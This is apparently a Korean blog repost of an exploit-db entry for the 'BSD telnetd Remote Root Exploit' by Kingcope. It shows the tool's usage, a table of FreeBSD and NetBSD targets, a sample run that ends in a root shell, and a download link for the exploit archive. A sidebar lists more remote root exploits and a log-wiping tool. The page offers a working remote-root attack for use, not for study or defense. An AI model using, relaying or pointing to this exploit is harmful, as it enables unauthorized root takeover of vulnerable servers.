http://www.exploit-db.com/exploits/19520/
This exploit was leaked on the Full Disclosure mailing list: |
http://seclists.org/fulldisclosure/2012/Jun/404 |
BSD telnetd Remote Root Exploit *ZERODAY* |
By Kingcope |
Year 2011 |
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d] |
[-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s |
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name |
[port]] |
TARGETS: |
0 FreeBSD 8.2 i386 |
1 FreeBSD 8.0/8.1/8.2 i386 |
2 FreeBSD 7.3/7.4 i386 |
3 FreeBSD 6.2/6.3/6.4 i386 |
4 FreeBSD 5.3/5.5 i386 |
5 FreeBSD 4.9/4.11 i386 |
6 NetBSD 5.0/5.1 i386 |
7 NetBSD 4.0 i386 |
8 FreeBSD 8.2 amd64 |
9 FreeBSD 8.0/8.1 amd64 |
10 FreeBSD 7.1/7.3/7.4 amd64 |
11 FreeBSD 7.1 amd64 |
12 FreeBSD 7.0 amd64 |
13 FreeBSD 6.4 amd64 |
14 FreeBSD 6.3 amd64 |
15 FreeBSD 6.2 amd64 |
16 FreeBSD 6.1 amd64 |
17 TESTING i386 |
18 TESTING amd64 |
Trying 192.168.2.8... |
Connected to 192.168.2.8. |
Escape character is '^]'. |
Trying SRA secure login: |
*** EXPLOITING REMOTE TELNETD |
*** by Kingcope |
*** Year 2011 |
USING TARGET -- FreeBSD 8.2 amd64 |
SC LEN: 30 |
ALEX-ALEX |
6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09 |
USER TTY FROM LOGIN@ IDLE WHAT |
kcope pts/0 192.168.2.3 6:32PM 4 _su (csh) |
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 |
02:41:51 UTC 2011 |
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64 |
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) |
Exploit: http://www.exploit-db.com/sploits/19520.zip |
Free BSD 환경에서만 적용
'Exploit-db' 카테고리의 다른 글
Zap3.c 로그지우는 프로그램 (0) | 2012.12.20 |
---|---|
Linux sock_sendpage() NULL Local Root Exploit (0) | 2012.12.19 |
tcpdump 3.6.3 remote root exploit in Free BSD (0) | 2012.05.11 |
samba-2.2.8 < remote root exploit (0) | 2012.05.11 |
samba <= 2.2.7a reply_nttrans() linux x86 remote root exploit (0) | 2012.05.11 |